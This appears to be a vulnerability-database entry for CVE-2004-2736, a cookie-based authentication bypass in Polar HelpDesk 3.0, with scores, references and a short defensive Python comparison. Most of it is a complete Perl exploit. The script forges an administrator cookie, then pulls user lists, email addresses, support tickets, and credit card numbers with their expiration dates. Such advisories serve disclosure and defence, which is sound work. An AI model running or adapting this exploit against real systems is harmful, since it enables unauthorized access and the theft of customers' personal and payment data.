CVE-2004-2736
CVSS 5.0
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:44:58

[Original] Polar HelpDesk 3.0 allows remote attackers to bypass authentication by setting the UserId and UserType values in a cookie.


[CNNVD] Polar Helpdesk Cookie-Based Authentication System Bypass Vulnerability (CNNVD-200412-1067)

Polar HelpDesk 3.0 is vulnerable. A remote attacker can bypass authentication by setting the UserId and UserType values in a cookie.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-287 [Improper Authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2736
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2736
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1067
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/16778
(UNKNOWN)  XF  polar-helpdesk-weak-security(16778)
http://www.securityfocus.com/bid/10775
(UNKNOWN)  BID  10775
http://www.securiteam.com/windowsntfocus/5OP0K0ADGA.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5OP0K0ADGA.html
http://www.osvdb.org/8168
(UNKNOWN)  OSVDB  8168
http://secunia.com/advisories/12120
(VENDOR_ADVISORY)  SECUNIA  12120

- Vulnerability information

Polar Helpdesk Cookie-Based Authentication System Bypass Vulnerability
Medium risk   Authorization issue
2004-12-31 00:00:00 2007-10-10 00:00:00
Remote
Polar HelpDesk 3.0 is vulnerable. A remote attacker can bypass authentication by setting the UserId and UserType values in a cookie.

- Advisories and patches

It is reported that this vulnerability is addressed in the current build of Polar HelpDesk. This is not confirmed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (24302)

Polar Helpdesk 3.0 Cookie Based Authentication System Bypass Vulnerability (EDBID:24302)
Platform: asp webapps
Date: 2004-07-21 (Verified)
Author: Noam Rathaus
source: http://www.securityfocus.com/bid/10775/info

Polar Helpdesk is reported prone to a cookie based authentication system bypass vulnerability. It is reported that the authentication and privilege system for Polar Helpdesk is based entirely on the values read from a cookie that is saved on the client system. An attacker may modify values in the appropriate cookie to gain administrative access to the affected software.
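As an added defender-side illustration (not code from the advisory, the PoC author or Polar HelpDesk), the following Python contrasts the cookie-trusting authorization pattern the description attributes to Polar HelpDesk 3.0, using the `HelpDesk_User=UserType=6&UserID=1` cookie format the PoC sends, with a hardened design that keeps identity and role server-side behind an unguessable session id. The `HelpDesk_Session` cookie name, the account table and the login stub are assumptions made for the example.

```python
import secrets
from typing import Dict, Optional
from urllib.parse import parse_qs

ADMIN_USER_TYPE = "6"  # UserType value the published PoC sends to be treated as an administrator


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie header into name -> value, keeping '=' inside values intact."""
    pairs = (c.strip().split("=", 1) for c in header.split(";") if "=" in c)
    return {name: value for name, value in pairs}


def vulnerable_authz(cookie_header: str) -> dict:
    """Pattern described in the advisory: identity and role are read straight from
    the client-controlled cookie, so anyone who edits UserType becomes an admin."""
    fields = parse_qs(parse_cookie_header(cookie_header).get("HelpDesk_User", ""))
    user_id = fields.get("UserID", [""])[0]
    user_type = fields.get("UserType", [""])[0]
    return {"user_id": user_id or None, "is_admin": user_type == ADMIN_USER_TYPE}


# Hardened design (assumed, not Polar HelpDesk's code): constructed sample accounts and an
# in-memory session table that only a successful login can populate.
USERS = {"1": "admin", "7": "customer"}
SESSIONS: Dict[str, str] = {}  # opaque session id -> user id


def login(user_id: str, password_ok: bool) -> Optional[str]:
    """Issue an unguessable session id only after the password check succeeded."""
    if not password_ok or user_id not in USERS:
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = user_id
    return sid


def hardened_authz(cookie_header: str) -> dict:
    """The cookie carries only the session id; identity and role come from the server,
    so a forged UserType/UserID value has nothing to influence."""
    sid = parse_cookie_header(cookie_header).get("HelpDesk_Session", "")
    user_id = SESSIONS.get(sid)
    if user_id is None:
        return {"user_id": None, "is_admin": False}
    return {"user_id": user_id, "is_admin": USERS[user_id] == "admin"}
```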

#!/usr/bin/perl
#
# Beyond Security Ltd.
# The below sample will do:
# 1) Grab a user list
# 2) Grab each user's email
# 3) List all available Inbox tickets
# 4) List all tickets with charge on them, and the credit card number and their expiration date

use IO::Socket;
use strict;

# Target host and the path under which Polar HelpDesk is installed, from the command line
my $host = $ARGV[0];
my $base_path = $ARGV[1];

my $remote = IO::Socket::INET->new ( Proto => "tcp",
       PeerAddr => $host,
       PeerPort => "80"
       );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

print "Get user list\n";

my $data_get_userlist = "GET /$base_path/user/modifyprofiles.asp HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

print $remote $data_get_userlist;
# print $data_get_userlist;

sleep(1);

my @names;
while (<$remote>)
{
 if (/<td>Results /)
 {
  while (/<a href="profileinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/g)
  {
   my $Item;
   $Item->{ID} = $1;
   $Item->{Name} = $2;
   print "ID: ".$Item->{ID}." Name: ".$Item->{Name}."\n";
   push @names, $Item;
  }
 }
}
close $remote;

print "Get users' email\n";

my $data_get_userdata = "";
foreach my $name (@names)
{
 $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

 unless ($remote) { die "cannot connect to http daemon on $host" }

 $data_get_userdata = "GET /$base_path/user/profileinfo.asp?ID=".$name->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

 print $remote $data_get_userdata;
# print $data_get_userdata;

 sleep(1);

 while (<$remote>)
 {
  if (/name="txtEmail" value="/)
  {
   /name="txtEmail" value="([^"]+)"/;
   print "ID: ".$name->{ID}.", Email: $1\n";
  }
 }
 close($remote);
}

print "Get Inbox tickets\n";

my $data_get_inboxtickets = "GET /$base_path/ticketsupport/Tickets.asp?ID=4 HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print $remote $data_get_inboxtickets;
#print $data_get_inboxtickets;

sleep(1);

while (<$remote>)
{
 if (/Ticket #/)
 {
  while (/<a href="tickets.asp\?ID=4&Personal=&TicketID=([0-9]+)[^>]+>([^<]+)<\/a>/g)
  {
   print "Ticket ID: $1, Name: $2\n";
  }
 }
}

close($remote);

print "Get billing information\n";

my $data_get_billing = "GET /$base_path/billing/billingmanager_income.asp HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print $remote $data_get_billing;
sleep(1);

my @tickets;

while (<$remote>)
{
 if (/Ticket No./)
 {
  my $Item;
  /<a href="..\/ticketsupport\/ticketinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/;
  $Item->{ID} = $1;
  $Item->{Name} = $2;
  print "Ticket ID: ".$Item->{ID}.", Name: ".$Item->{Name}."\n";
  push @tickets, $Item;
 }
}

close($remote);

foreach my $ticket (@tickets)
{
 my $data_get_billingcreditcard = "GET /$base_path/billing/billingmanager_ticketinfo.asp?ID=".$ticket->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
 $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

 unless ($remote) { die "cannot connect to http daemon on $host" }

 print $remote $data_get_billingcreditcard;
 sleep(1);
 
 my $Count = 0;
 my $Print = 0;
 while (<$remote>)
 {
  if ($Print)
 {
  $Count ++;
  if ($Count > 1)
  {
   /<td[^>]+>([^<]+)<\/td>/;
   print $1, "\n";
  $Print = 0;
  }
 }
 if (/Expiration date<br>/)
 {
  print "Expiration date: ";
  $Count = 0;
  $Print = 1;
 }
  if (/Credit Card<br>/)
 {
  print "Credit Card: ";
  $Count = 0;
  $Print = 1;
 }
 }
}
		

- Vulnerability information

8168
Polar HelpDesk Cookie Modification Privilege Escalation
Remote / Network Access Authentication Management
Loss of Integrity
Exploit Public

- Vulnerability description

Polar HelpDesk contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a user sends a specially crafted cookie to the server. This flaw may lead to a loss of integrity.

- Timeline

2004-07-22 Unknown
2004-07-22 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
